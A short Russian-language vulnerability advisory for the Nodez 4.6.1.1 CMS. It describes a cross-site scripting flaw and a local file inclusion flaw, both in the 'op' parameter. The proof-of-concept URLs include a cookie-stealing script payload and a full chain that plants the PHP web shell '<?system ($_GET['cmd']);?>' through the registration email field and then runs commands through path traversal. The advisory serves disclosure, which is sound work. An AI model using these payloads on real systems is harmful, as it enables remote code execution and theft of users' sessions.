Программа: Nodez 4.6.1.1, возможно более ранние версии.

Уязвимость позволяет удаленному пользователю произвести XSS нападение и
выполнить произвольный PHP сценарий на целевой системе.

1. Уязвимость существует из-за недостаточной обработки входных данных в
параметре "op". Удаленный пользователь может с помощью специально
сформированного запроса выполнить произвольный код сценария в браузере жертвы в
контексте безопасности уязвимого сайта.

Пример:

http://localhost/nodez/?node=system&op=block<script>alert(document.cookie)</script>&block=3&bop=more

2. Уязвимость существует из-за недостаточной обработки входных данных в
параметре "op". Удаленный пользователь может подключить и выполнить произвольные
локальные файлы на системе. Дальнейшая эксплуатация уязвимости возможна путем
записи PHP код в файл "list.gtdat", который хранит данные о зарегистрированных
пользователях.

Пример:

http://localhost/nodez/?node=system&op=/../../../[SHELL]%00&cmd=dir

Пример:

register an account :
username:hamid
password:hamidnetworksecurityteam
email: PHP code like (PHP Code Injection) :
<?system ($_GET['cmd']);?>
and then use local file inclusion :
http://localhost/nodez/?node=system&op=/../../cache/users/list.gtdat%00&cmd=dir

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии